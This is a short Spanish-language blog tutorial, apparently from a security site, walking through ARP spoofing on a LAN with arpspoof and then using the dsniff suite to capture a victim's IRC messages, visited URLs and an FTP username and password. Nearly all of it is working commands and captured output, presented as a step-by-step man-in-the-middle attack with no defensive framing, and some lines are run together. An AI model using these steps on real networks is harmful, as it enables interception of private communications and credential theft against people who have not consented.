Hola!
Muy buenas a todos/as!
Ya he hablado en otras ocasiones de ARP Spoofing esta vez lo haremos desde Linux además veremos como vamos viendo los datos que vamos capturando.
Yo las pruebas las haré con Bacltrack-R1
Primero de todo miramos si tenemos ip_forwanding habilitadoroot@bt:~# cat /proc/sys/net/ipv4/ip_forward0Habilitamos ip_forwanding
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forwardAhora hacemos ARP Spoofing
root@bt:~# arpspoof -i eth0 -t 192.168.57.2 192.168.57.141Hacemos arpspoof poniendo la interfaz, la dirección del router y la ip de la víctima. Podremos ver como va haciendo el spoofing
0:c:29:7d:fa:a9 0:50:56:eb:ac:71 0806 42: arp reply 192.168.57.141 is-at 0:c:29:7d:fa:a90:c:29:7d:fa:a9 0:50:56:eb:ac:71 0806 42: arp reply 192.168.57.141 is-at 0:c:29:7d:fa:a90:c:29:7d:fa:a9 0:50:56:eb:ac:71 0806 42: arp reply 192.168.57.141 is-at 0:c:29:7d:fa:a9Ahora con msgsnarf analizaremos los mensajes que se emiten por emsanjería instantánea,por IRC etc..
root@bt:~# msgsnarf -i eth0Cuando la víctima utilice un servicio de mensajería instantánea nos saldrá en vivo que está haciendo:
msgsnarf: listening on eth0Aug 22 18:25:58 IRC *** victima (~victima@CJ-emenrf.user.operador.com) has joined channel #xchatAug 22 18:28:22 IRC OPNNLzerg > victima: VERSIONAug 22 18:28:31 IRC *** victima (~victima@80.174.134.115.dyn.operador.operador.com) has joined channel #soopaAug 22 18:28:38 IRC victima > #soopa: Hi guysAhora usaremos urlsnarf para ver las peticiones HTTP que hace el usuario
root@bt:~# urlsnarf -i eth0Y podemos ver las peticiones que hace el usuario:
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]192.168.57.141 – - [22/Aug/2011:18:33:31 +0200] “GET http://www.dragonjar.org/ HTTP/1.1″ – - “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”192.168.57.141 – - [22/Aug/2011:18:33:36 +0200] “GET http://www.dragonjar.org/wp-content/themes/dragonjar.org/thumb.php?src=wp-content/uploads/2011/08/BT5-BT5.R1-1.jpg&w=200&h=200&zc=1&q=90 HTTP/1.1″ – - “http://www.dragonjar.org/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”192.168.57.141 – - [22/Aug/2011:18:33:36 +0200] “GET http://www.dragonjar.org/wp-content/themes/dragonjar.org/thumb.php?src=wp-content/uploads/2011/08/Seguridad-Facebook.jpg&w=200&h=200&zc=1&q=90 HTTP/1.1″ – - “http://www.dragonjar.org/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”192.168.57.141 – - [22/Aug/2011:18:33:36 +0200] “GET http://www.dragonjar.org/wp-content/themes/dragonjar.org/thumb.php?src=wp-content/uploads/2011/08/BackTrack5R1-300×114.jpg&w= 200&h=200&zc=1&q=90 HTTP/1.1″ – - “http://www.dragonjar.org/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”192.168.57.141 – - [22/Aug/2011:18:33:36 +0200] “GET http://www.dragonjar.org/wp-content/themes/dragonjar.org/thumb.php?src=wp-content/uploads/2010/06/SamuraiWeb.jpg&w=200&h =200&zc=1&q=90 HTTP/1.1″ – - “http://www.dragonjar.org/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”Y ahora con drifnet lo que haremos será recoger todas las imágenes que la víctima mientras va navegando va encontrando
dsniff: listening on eth0—————–08/22/11 19:06:24 tcp 192.168.57.148.1157 -> servidor.21 (ftp)USER dragonjarPASS @dragonjarY con esto ya hemos trabajado con la suite de dsniff